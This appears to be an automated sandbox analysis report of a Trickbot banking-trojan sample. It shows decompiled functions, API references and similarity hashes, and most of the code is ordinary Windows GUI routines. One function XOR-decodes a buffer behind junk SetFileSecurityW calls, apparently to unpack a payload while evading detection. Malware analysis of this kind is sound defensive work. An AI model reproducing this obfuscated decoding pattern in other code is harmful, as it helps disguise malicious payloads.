0x0041e6fb
0x0041e6fc
0x0041e6fe
0x0041e701
0x0041e704
0x0041e70b
0x0041e710
0x0041e712
0x0041e713
0x0041e713
0x0041e713
0x0041e716
0x0041e718
0x0041e719
0x0041e719
0x0041e71c
0x0041e724
0x0041e730
0x0041e73a
0x0041e741
0x0041e747
0x0041e751
0x0041e759
0x0041e75d
0x0041e75e
0x0041e762
0x0041e763
0x0041e76a
0x0041e76d
0x0041e770
0x0041e776
0x0041e779
0x0041e77c
0x0041e789
0x0041e78f
0x0041e798
0x0041e7a0
0x0041e7a4
0x0041e7a9
0x0041e7aa
0x0041e7ad
0x0041e6b6
0x00000000
0x0041e6b6
0x00000000
0x0041e7ad
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e649
0x0041e649
0x0041e657
0x0041e65d
0x0041e65e
0x0041e65e
0x00000000
0x0041e61d
0x0041e61d
0x0041e622
0x0041e629
0x0041e629
0x0041e632
0x0041e7e4
0x0041e7ea
0x0041e7f2
0x0041e7f2

APIs

__EH_prolog.LIBCMT ref: 0041E5B9
GetMenuStringA.USER32(?,00000000,00000000,00000100,00000100), ref: 0041E602

Part of subcall function 00418246: lstrlenA.KERNEL32(00000000,00000100,0041C6F4,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,?,?), ref: 00418259

Part of subcall function 0041806A: __EH_prolog.LIBCMT ref: 0041806F

DeleteMenu.USER32(?,?,00000000), ref: 0041E657
GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041E66F
lstrlenA.KERNEL32(?), ref: 0041E67C
wsprintfA.USER32 ref: 0041E741
GetMenuItemCount.USER32(00000001), ref: 0041E7BC
InsertMenuA.USER32(00000002,00000000,00000400,00000002,00000000), ref: 0041E78F

Part of subcall function 00417EC8: InterlockedDecrement.KERNEL32(-000000F4), ref: 00417EDC

Strings

&%d , xrefs: 0041E73B
\, xrefs: 0041E688

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Menu$H_prologlstrlen$CountCurrentDecrementDeleteDirectoryInsertInterlockedItemStringwsprintf
String ID: &%d $\
API String ID: 3188129661-1982479665
Opcode ID: fcace9284245d27419bfc17ea5fb48adc5c4eb2041604493cbe5413d3927dd6b
Instruction ID: 18925f41e954725a6c414503a77f1e640bde2149bbc025fa5eed2a7b53e34103
Opcode Fuzzy Hash: fcace9284245d27419bfc17ea5fb48adc5c4eb2041604493cbe5413d3927dd6b
Instruction Fuzzy Hash: 1B71F179900209EFDB01DFA5C884AEEBBF4FF08304F10816EE856D7291D774A984CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041755F, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041755F(intOrPtr* __ecx) {
				intOrPtr _t81;
				intOrPtr _t91;
				struct HWND__* _t92;
				intOrPtr* _t143;
				intOrPtr* _t146;
				void* _t148;
				void* _t150;

				_t119 = __ecx;
				E00405340(E00437748, _t148);
				_t146 = __ecx;
				 *((intOrPtr*)(_t148 - 0x10)) = _t150 - 0x34;
				 *((intOrPtr*)(_t148 - 0x24)) = __ecx;
				if( *(_t148 + 0x10) == 0) {
					 *(_t148 + 0x10) =  *(E00432562() + 8);
				}
				_t143 =  *((intOrPtr*)(E00432562() + 0x1038));
				 *((intOrPtr*)(_t148 - 0x28)) = _t143;
				 *(_t148 - 0x14) = 0;
				 *(_t148 - 0x18) = 0;
				 *(_t148 - 4) = 0;
				E0041B266(_t119, 0x10);
				E0041B266(_t119, 0x3c000);
				if(_t143 == 0) {
					L5:
					if( *(_t148 + 8) == 0) {
						L31:
						L33:
						 *[fs:0x0] =  *((intOrPtr*)(_t148 - 0xc));
						return 0;
					}
					_t81 =  *0x447478; // 0x44748c
					 *((intOrPtr*)(_t148 - 0x1c)) = _t81;
					 *(_t148 - 4) = 1;
					 *((intOrPtr*)(_t148 - 0x20)) = 0;
					if((0 | E0041C952( *(_t148 + 8), _t148 - 0x1c, _t148 - 0x20) == 0x00000000) != 0) {
						L13:
						E0041C7A1(_t148 - 0x40,  *(_t148 + 8));
						 *(_t148 - 4) = 2;
						E0041CADB(_t148 - 0x40,  *((intOrPtr*)(_t148 - 0x20)));
						 *(_t148 - 0x14) = E0041C83E(_t148 - 0x40);
						 *(_t148 - 4) = 1;
						E0041C830(_t148 - 0x40);
						if( *(_t148 - 0x14) != 0) {
							 *(_t148 + 8) = GlobalLock( *(_t148 - 0x14));
						}
						L15:
						 *(_t146 + 0x2c) =  *(_t146 + 0x2c) | 0xffffffff;
						 *(_t146 + 0x24) =  *(_t146 + 0x24) | 0x00000010;
						E00418D00(_t148, _t146);
						_t91 =  *((intOrPtr*)(_t148 + 0xc));
						if(_t91 != 0) {
							_t92 =  *(_t91 + 0x1c);
						} else {
							_t92 = 0;
						}
						 *(_t148 - 0x18) = CreateDialogIndirectParamA( *(_t148 + 0x10),  *(_t148 + 8), _t92, E004172A4, 0);
						 *(_t148 - 4) = 0;
						E00417EC8(_t148 - 0x1c);
						 *(_t148 - 4) =  *(_t148 - 4) | 0xffffffff;
						if(_t143 != 0) {
							 *((intOrPtr*)( *_t143 + 0x14))(_t148 - 0x34);
							if( *(_t148 - 0x18) != 0) {
								 *((intOrPtr*)( *_t146 + 0xb4))(0);
							}
						}
						if(E00418D4C() == 0) {
							 *((intOrPtr*)( *_t146 + 0xa4))();
						}
						if( *(_t148 - 0x18) != 0 && ( *(_t146 + 0x24) & 0x00000010) == 0) {
							DestroyWindow( *(_t148 - 0x18));
							 *(_t148 - 0x18) = 0;
						}
						if( *(_t148 - 0x14) != 0) {
							GlobalUnlock( *(_t148 - 0x14));
							GlobalFree( *(_t148 - 0x14));
						}
						if( *(_t148 - 0x18) != 0 || ( *(_t146 + 0x24) & 0x00000010) == 0) {
							_push(1);
							_pop(0);
							goto L33;
						} else {
							goto L31;
						}
					}
					if(GetSystemMetrics(0x2a) == 0 || E0040504F( *((intOrPtr*)(_t148 - 0x1c)), "MS Shell Dlg") != 0 && E0040504F( *((intOrPtr*)(_t148 - 0x1c)), "MS Sans Serif") != 0 && E0040504F( *((intOrPtr*)(_t148 - 0x1c)), ?str?) != 0) {
						goto L15;
					} else {
						if( *((short*)(_t148 - 0x20)) == 8) {
							 *((intOrPtr*)(_t148 - 0x20)) = 0;
						}
						goto L13;
					}
				}
				_push(_t148 - 0x34);
				if( *((intOrPtr*)( *_t146 + 0xb4))() == 0) {
					goto L31;
				}
				 *(_t148 + 8) =  *((intOrPtr*)( *_t143 + 0x10))(_t148 - 0x34,  *(_t148 + 8));
				goto L5;
			}

0x0041755f
0x00417564
0x00417574
0x00417576
0x00417579
0x0041757c
0x00417586
0x00417586
0x0041758e
0x00417596
0x00417599
0x0041759c
0x0041759f
0x004175a2
0x004175ac
0x004175b3
0x004175dc
0x004175df
0x00417774
0x0041777b
0x00417780
0x00417789
0x00417789
0x004175e5
0x004175ea
0x004175f0
0x004175f9
0x00417612
0x00417667
0x0041766d
0x00417678
0x0041767c
0x0041768c
0x0041768f
0x00417693
0x0041769b
0x004176a6
0x004176a6
0x004176a9
0x004176a9
0x004176ad
0x004176b2
0x004176b7
0x004176bc
0x004176c2
0x004176be
0x004176be
0x004176be
0x004176db
0x004176de
0x004176e1
0x00417705
0x0041770b
0x00417715
0x0041771b
0x00417722
0x00417722
0x0041771b
0x0041772f
0x00417735
0x00417735
0x0041773e
0x00417749
0x0041774f
0x0041774f
0x00417755
0x0041775a
0x00417763
0x00417763
0x0041776c
0x00417778
0x0041777a
0x00000000
0x00000000
0x00000000
0x00000000
0x0041776c
0x0041761e
0x00000000
0x0041765d
0x00417662
0x00417664
0x00417664
0x00000000
0x00417662
0x0041761e
0x004175ba
0x004175c5
0x00000000
0x00000000
0x004175d9
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00417564
GetSystemMetrics.USER32(0000002A), ref: 00417616
GlobalLock.KERNEL32(?,?,00000000,?), ref: 004176A0
CreateDialogIndirectParamA.USER32(?,?,?,Function_000172A4,00000000), ref: 004176D2

Part of subcall function 00417EC8: InterlockedDecrement.KERNEL32(-000000F4), ref: 00417EDC

DestroyWindow.USER32(0043A9D0), ref: 00417749
GlobalUnlock.KERNEL32(?,?,?,00000000,?), ref: 0041775A
GlobalFree.KERNEL32(?), ref: 00417763

Strings

MS Shell Dlg, xrefs: 00417624
MS Sans Serif, xrefs: 00417637
Helv, xrefs: 0041764A

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
String ID: Helv$MS Sans Serif$MS Shell Dlg
API String ID: 2343056566-2894235370
Opcode ID: 7bbe96c57c18692c3f4821669d396ab0e3751de740c1d09e1f9de2a533ca9933
Instruction ID: 40b7ef30976542998248d9f651bb598fe2cde8951718d0c051aeba893af69318
Opcode Fuzzy Hash: 7bbe96c57c18692c3f4821669d396ab0e3751de740c1d09e1f9de2a533ca9933
Instruction Fuzzy Hash: E1618F7190420AEFCF11EFA4D9859EEBBB1BF04314F20442FF555A2291DB789E81CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00413440, Relevance: 16.7, APIs: 11, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413440(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20) {
				struct tagRECT _v16;
				struct tagRECT _v36;
				int _t59;
				long _t72;
				intOrPtr* _t85;
				intOrPtr _t87;
				intOrPtr* _t94;
				struct HWND__* _t98;
				struct HWND__* _t99;
				int _t101;
				long _t102;

				_t101 = _a8;
				_t111 = _t101 - 0x82;
				if(_t101 != 0x82) {
					_t98 = _a4;
					__eflags = GetPropA(_t98, 0);
					if(__eflags == 0) {
						__eflags = _t101 - 0x18;
						if(__eflags > 0) {
							__eflags = _t101 - 0x83;
							if(__eflags > 0) {
								__eflags = _t101 - 0x1943;
								if(__eflags < 0) {
									goto L7;
								} else {
									__eflags = _t101 - 0x1944;
									if(__eflags <= 0) {
										 *_a16 = 1;
										return 0x3e9;
									} else {
										goto L7;
									}
								}
							} else {
								if(__eflags == 0) {
									__eflags =  *0x44d360 - 0x30a;
									if(__eflags >= 0) {
										goto L7;
									} else {
										GetWindowRect(_t98,  &_v16);
										_t102 = CallWindowProcA(E00410610(__eflags, _t98, _a20), _t98, _t101, _a12, _a16);
										_t94 = _a12;
										_t85 =  &_v36;
										 *_t85 =  *_t94;
										 *((intOrPtr*)(_t85 + 4)) =  *((intOrPtr*)(_t94 + 4));
										 *((intOrPtr*)(_t85 + 8)) =  *((intOrPtr*)(_t94 + 8));
										 *((intOrPtr*)(_t85 + 0xc)) =  *((intOrPtr*)(_t94 + 0xc));
										InflateRect( &_v36, 2, 1);
										_t87 = _v16.right;
										__eflags = _v36.bottom - _t87;
										if(_v36.bottom < _t87) {
											_t59 = _v36.bottom + 1;
											__eflags = _t59;
											_v36.top = _t59;
											_v36.bottom = _t87 + 1;
											_t99 = GetParent(_t98);
											ScreenToClient(_t99,  &_v36);
											ScreenToClient(_t99,  &(_v36.right));
											InvalidateRect(_t99,  &_v36, 1);
										}
										return _t102;
									}
								} else {
									__eflags = _t101 - 0x46;
									if(__eflags == 0) {
										__eflags =  *0x44d360 - 0x30a;
										if(__eflags >= 0) {
											E004122E0(_t98, _a16);
										}
									}
									goto L7;
								}
							}
						} else {
							if(__eflags == 0) {
								__eflags =  *0x44d360 - 0x30a;
								if(__eflags < 0) {
									__eflags = _a12;
									if(__eflags == 0) {
										E004122E0(_t98, 0);
									}
								}
								goto L7;
							} else {
								__eflags = _t101 - 0xf;
								if(__eflags == 0) {
									_t72 = CallWindowProcA(E00410610(__eflags, _t98, _a20), _t98, _t101, _a12, _a16);
									E00412F80(_t98, 0, _a20);
									return _t72;
								} else {
									L7:
									return CallWindowProcA(E00410610(__eflags, _t98, _a20), _t98, _t101, _a12, _a16);
								}
							}
						}
					} else {
						return CallWindowProcA(E00410610(__eflags, _t98, _a20), _t98, _t101, _a12, _a16);
					}
				} else {
					return E00410840(_t111, _a4, _t101, _a12, _a16, _a20);
				}
			}

0x00413445
0x0041344a
0x00413450
0x00413478
0x0041348a
0x0041348c
0x004134b6
0x004134b9
0x004134ee
0x004134f4
0x00413503
0x00413509
0x00000000
0x0041350b
0x0041350b
0x00413511
0x0041365f
0x0041366d
0x00413517
0x00000000
0x00413517
0x00413511
0x004134f6
0x004134f6
0x0041359d
0x004135a6
0x00000000
0x004135ac
0x004135b2
0x004135d9
0x004135db
0x004135df
0x004135ec
0x004135f1
0x004135f7
0x004135fa
0x00413602
0x00413608
0x0041360c
0x00413610
0x00413617
0x00413617
0x00413618
0x0041361f
0x00413629
0x00413637
0x0041363f
0x00413649
0x00413649
0x00413657
0x00413657
0x004134fc
0x004134fc
0x004134ff
0x0041357b
0x00413584
0x00413590
0x00413595
0x00413584
0x00000000
0x004134ff
0x004134f6
0x004134bb
0x004134bb
0x00413551
0x0041355a
0x00413560
0x00413565
0x0041356e
0x00413573
0x00413565
0x00000000
0x004134c1
0x004134c1
0x004134c4
0x00413534
0x00413540
0x00413550
0x004134c6
0x004134c6
0x004134ed
0x004134ed
0x004134c4
0x004134bb
0x0041348e
0x004134b5
0x004134b5
0x00413452
0x00413475
0x00413475

APIs

GetPropA.USER32(?,00000000), ref: 00413484
CallWindowProcA.USER32(00000000), ref: 004134A9

Part of subcall function 00410840: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 00410866
Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041087E
Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041088A

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: 5f6332765df40542be61fce3ac7c08893d7d92277b7ac3c206b96f86d35721ed
Instruction ID: 8475b593838957f47efc4661ee566d8bb1c018f192de32ee172b5bbbee78746a
Opcode Fuzzy Hash: 5f6332765df40542be61fce3ac7c08893d7d92277b7ac3c206b96f86d35721ed
Instruction Fuzzy Hash: 8951B176A04200BFD710EF45DC85DBFB7B8EBC9725F44852EF94483200D279AD868BA6

Uniqueness

Uniqueness Score: -1.00%

Function 004137D0, Relevance: 16.6, APIs: 11, Instructions: 140
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004137D0(struct HWND__* _a4, struct HDC__* _a8) {
				struct tagRECT _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				void* _t26;
				struct HWND__* _t43;

				_t43 = _a4;
				_t26 = GetWindowLongA(_t43, 0xfffffff0);
				_v20 = _t26;
				if((_t26 & 0x10000000) == 0) {
					L15:
					return _t26;
				} else {
					GetClientRect(_t43,  &_v16);
					_t26 = _v20 & 0x0000001f;
					if(_t26 > 0x12) {
						goto L15;
					} else {
						switch( *((intOrPtr*)(0 +  &M00413934))) {
							case 0:
								_t38 = SendMessageA(_t43, 0x31, 0, 0);
								if(_t38 == 0) {
									_t42 = _a8;
								} else {
									_t42 = _a8;
									_t38 = SelectObject(_t42, _t38);
								}
								SetBkMode(_t42, 2);
								_t45 = SendMessageA(GetParent(_t43), 0x138, _t42, _t43);
								_t51 = _t45;
								if(_t45 != 0) {
									_t45 = SelectObject(_t42, _t45);
								}
								_t26 = E004136F0(_t51, _t43, _t42,  &_v24, _v28);
								if(_t38 != 0) {
									_t26 = SelectObject(_t42, _t38);
								}
								if(_t45 == 0) {
									goto L15;
								} else {
									return SelectObject(_t42, _t45);
								}
								goto L16;
							case 1:
								__eax =  &_v16;
								_push(0xf);
								_push(0);
								return E00410920(_a8,  &_v16, 2);
								goto L16;
							case 2:
								__eax =  &_v16;
								_push(0xf);
								_push(0);
								_v16.left = _v16.left + 1;
								_t20 =  &(_v16.top);
								 *_t20 = _v16.top + 1;
								__eflags =  *_t20;
								E00410920(_a8,  &_v16, 0) = OffsetRect( &_v16, 0xffffffff, 0xffffffff);
								_push(0xf);
								_push(2);
								return E00410920(_a8,  &_v16, 2);
								goto L16;
							case 3:
								__eax =  &_v16;
								_push(0xf);
								_push(2);
								return E00410920(_a8,  &_v16, 0);
							case 4:
								goto L15;
						}
					}
				}
				L16:
			}

0x004137d5
0x004137de
0x004137e4
0x004137ed
0x00413933
0x00413933
0x004137f3
0x004137f9
0x00413803
0x00413809
0x00000000
0x0041380f
0x00413817
0x00000000
0x0041382d
0x00413831
0x00413843
0x00413833
0x00413833
0x0041383f
0x0041383f
0x0041384a
0x00413861
0x00413863
0x00413865
0x0041386f
0x0041386f
0x0041387d
0x00413887
0x0041388b
0x0041388b
0x00413893
0x00000000
0x00413899
0x004138a8
0x004138a8
0x00000000
0x00000000
0x004138a9
0x004138ad
0x004138b3
0x004138c8
0x00000000
0x00000000
0x004138c9
0x004138cd
0x004138d3
0x004138d5
0x004138db
0x004138db
0x004138db
0x004138f2
0x004138fc
0x004138fe
0x00413913
0x00000000
0x00000000
0x00413914
0x00413918
0x0041391e
0x00000000
0x00000000
0x00000000
0x00000000
0x00413817
0x00413809
0x00000000

APIs

GetWindowLongA.USER32(?,000000F0), ref: 004137DE
GetClientRect.USER32(?,?), ref: 004137F9
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0041382B
SelectObject.GDI32(?,00000000), ref: 00413839
SetBkMode.GDI32(?,00000002), ref: 0041384A
GetParent.USER32(?), ref: 00413858
SendMessageA.USER32(00000000), ref: 0041385F
SelectObject.GDI32(?,00000000), ref: 00413869
SelectObject.GDI32(?,00000000), ref: 0041388B
SelectObject.GDI32(?,00000000), ref: 0041389B
OffsetRect.USER32(?,000000FF,000000FF), ref: 004138F2

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ObjectSelect$MessageRectSend$ClientLongModeOffsetParentWindow
String ID:
API String ID: 3606012576-0
Opcode ID: f5e5fc7cf061de274a62077bd04af8ebf219799e8257272e77fd26ec38f0fab2
Instruction ID: 29591e938e965fccbcfd294214db091b755d3254d59085554c9ab1b470bb1492
Opcode Fuzzy Hash: f5e5fc7cf061de274a62077bd04af8ebf219799e8257272e77fd26ec38f0fab2
Instruction Fuzzy Hash: 72410B732043017BD610AF549C46FBF73ACEBC5B25F44012EFA0156183DBA9DA45877A

Uniqueness

Uniqueness Score: -1.00%

Function 00410F41, Relevance: 16.6, APIs: 11, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410F41(void* __eax, void* __ebx, void* __edx, struct HWND__* _a12) {
				long _t9;
				struct HWND__* _t15;
				struct HWND__* _t21;
				struct HWND__* _t24;
				long _t25;
				long _t30;
				void* _t37;
				signed int _t40;
				struct HWND__* _t45;
				struct HWND__* _t49;
				void* _t58;

				_t1 = __ebx + 0x56;
				 *_t1 =  *((intOrPtr*)(__ebx + 0x56)) + __edx;
				if( *_t1 != 0) {
					_t49 = _a12;
					_t9 = GetWindowLongA(_t49, 0xfffffffc);
					_t40 = 0;
					__eflags = 0;
					_t37 = RemovePropA;
					do {
						_t42 = _t40 + _t40 * 2;
						__eflags =  *((intOrPtr*)(0x44dda0 + (_t40 + _t40 * 2) * 8)) - _t9;
						if(__eflags == 0) {
							_t30 = E00410610(__eflags, _t49, _t40);
							_t58 = _t58 + 8;
							RemovePropA(_t49, 0);
							SetWindowLongA(_t49, 0xfffffffc, _t30);
							_t9 = 0;
							__eflags = 0;
							_t40 = 0x10;
						}
						_t40 = 1 + _t40;
						__eflags = _t40 - 6;
					} while (__eflags < 0);
					if(__eflags == 0) {
						__eflags = _t9 - E00411AF0;
						if(__eflags != 0) {
							_t15 = GetPropA(_t49, 0);
							__eflags = _t15;
							if(_t15 != 0) {
								L12:
								__eflags = 0;
								SetPropA(_t49, 0, 1);
							} else {
								_t21 = GetPropA(_t49, 0);
								__eflags = _t21;
								if(_t21 != 0) {
									goto L12;
								} else {
									_t24 = GetPropA(_t49, 0);
									__eflags = _t24;
									if(_t24 != 0) {
										goto L12;
									}
								}
							}
						} else {
							_t25 = E00410610(__eflags, _t49, _t40);
							RemovePropA(_t49, 0);
							SetWindowLongA(_t49, 0xfffffffc, _t25);
						}
					}
					_t45 = GetWindow(_t49, 5);
					__eflags = _t45;
					while(_t45 != 0) {
						E00410F40(_t10, _t37, _t42, _t45);
						_t45 = GetWindow(_t45, 2);
						__eflags = _t45;
					}
					return 1;
				} else {
					return 0;
				}
			}

0x00410f46
0x00410f46
0x00410f4b
0x00410f56
0x00410f5d
0x00410f63
0x00410f63
0x00410f6b
0x00410f71
0x00410f71
0x00410f74
0x00410f7b
0x00410f7f
0x00410f84
0x00410f93
0x00410f99
0x00410f9b
0x00410f9b
0x00410f9d
0x00410f9d
0x00410fa2
0x00410fa3
0x00410fa3
0x00410fa8
0x00410faa
0x00410faf
0x00410fe1
0x00410fe3
0x00410fe5
0x00411007
0x00411009
0x00411013
0x00410fe7
0x00410ff1
0x00410ff3
0x00410ff5
0x00000000
0x00410ff7
0x00411001
0x00411003
0x00411005
0x00000000
0x00000000
0x00411005
0x00410ff5
0x00410fb1
0x00410fb3
0x00410fc7
0x00410fcd
0x00410fcd
0x00410faf
0x00411024
0x00411026
0x00411028
0x0041102b
0x00411035
0x00411037
0x00411037
0x00411044
0x00410f4d
0x00410f53
0x00410f53

APIs

GetWindowLongA.USER32(?,000000FC), ref: 00410F5D
RemovePropA.USER32(?,00000000), ref: 00410F93
SetWindowLongA.USER32(?,000000FC,00000000), ref: 00410F99
RemovePropA.USER32(?,00000000), ref: 00410FC7
SetWindowLongA.USER32(?,000000FC,00000000), ref: 00410FCD
GetWindow.USER32(?,00000005), ref: 00411022
GetWindow.USER32(00000000,00000002), ref: 00411033

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$Long$PropRemove
String ID:
API String ID: 3256693057-0
Opcode ID: 64cac4bf1b8b2b0dd676f4c8ee39d47b17cc52b9532cc6d9b23ba9b0328e075e
Instruction ID: 3f54d679407ba834f3b5476e11c3977a5f29ff7089c908982676509a0f4f04c7
Opcode Fuzzy Hash: 64cac4bf1b8b2b0dd676f4c8ee39d47b17cc52b9532cc6d9b23ba9b0328e075e
Instruction Fuzzy Hash: 0121047B6000253AD751AB78AC01EFF279CDB8A354B110136FA00D2251FBA98CC3877E

Uniqueness

Uniqueness Score: -1.00%

Function 00402E40, Relevance: 16.6, APIs: 11, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E40(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t13;
				signed int _t25;
				intOrPtr _t30;
				intOrPtr _t32;
				signed int _t38;
				intOrPtr _t43;
				void* _t45;

				_t13 = _a12;
				_t38 = 0;
				if(_t13 != 0) {
					_t32 = _a8;
					_t43 = _a4;
					do {
						SetFileSecurityW(0, 0, 0);
						SetFileSecurityW(0, 0, 0);
						SetFileSecurityW(0, 0, 0);
						SetFileSecurityW(0, 0, 0);
						SetFileSecurityW(0, 0, 0);
						SetFileSecurityW(0, 0, 0);
						SetFileSecurityW(0, 0, 0);
						SetFileSecurityW(0, 0, 0);
						SetFileSecurityW(0, 0, 0);
						SetFileSecurityW(0, 0, 0);
						SetFileSecurityW(0, 0, 0);
						_t25 = E004050FE(_t43);
						_t45 = _t45 + 4;
						 *(_t38 + _t32) =  *(_t38 + _t32) ^  *(_t43 + _t38 % _t25 * 2);
						_t30 = _a12;
						_t38 = _t38 + 1;
					} while (_t38 != _t30);
					return _t30;
				}
				return _t13;
			}

0x00402e40
0x00402e45
0x00402e49
0x00402e50
0x00402e55
0x00402e60
0x00402e66
0x00402e6e
0x00402e76
0x00402e7e
0x00402e86
0x00402e8e
0x00402e96
0x00402e9e
0x00402ea6
0x00402eae
0x00402eb6
0x00402eb9
0x00402ec4
0x00402ed2
0x00402ed5
0x00402ed9
0x00402eda
0x00000000
0x00402ee0
0x00402ee2

APIs

SetFileSecurityW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,004031B4,00000000,00000000,00000000), ref: 00402E66
SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402E6E
SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402E76
SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402E7E
SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402E86
SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402E8E
SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402E96
SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402E9E
SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402EA6
SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402EAE
SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402EB6

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: FileSecurity
String ID:
API String ID: 200422441-0
Opcode ID: ab51d9e2ea5fa16e1d901246b7368571613d6852a14defd374ddf01b1257bcaf
Instruction ID: cd41f3dbe253b9f5e7589d4e6c532eb06652257514d45199ff00fec08aee85ce
Opcode Fuzzy Hash: ab51d9e2ea5fa16e1d901246b7368571613d6852a14defd374ddf01b1257bcaf
Instruction Fuzzy Hash: B01100317C83693AF67196AA5C47F5B6E959B45FA1F240016F74C7E1C0C9D074018AAE

Uniqueness

Uniqueness Score: -1.00%

Function 00431F3B, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 199
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00431F3B(void* __ecx, void* __edi) {
				void* __esi;
				char* _t78;
				void* _t83;
				intOrPtr* _t84;
				char* _t85;
				void* _t93;
				char* _t119;
				void* _t129;
				char* _t130;
				intOrPtr* _t134;
				intOrPtr _t137;
				char* _t160;
				intOrPtr _t163;
				intOrPtr* _t165;
				long _t167;
				void* _t168;
				void* _t170;
				void* _t171;
				void* _t173;

				_t137 =  *((intOrPtr*)(__ecx + 0x80));
				E00405340(E004388B4, _t168);
				_t171 = _t170 - 0x18;
				_t78 =  *0x447478; // 0x44748c
				_t163 = _t137;
				 *(_t168 - 0x20) = _t78;
				 *(_t168 - 4) =  *(_t168 - 4) & 0x00000000;
				 *(_t168 - 0x10) = _t78;
				 *(_t168 - 4) = 1;
				E0041DA3F(_t163,  *((intOrPtr*)(E00432562() + 8)), _t168 - 0x20);
				_t134 =  *((intOrPtr*)(_t163 + 8));
				if(_t134 != 0) {
					_t160 = "command";
					do {
						_t84 = _t134;
						_t134 =  *_t134;
						_t165 =  *((intOrPtr*)(_t84 + 8));
						_t85 =  *0x447478; // 0x44748c
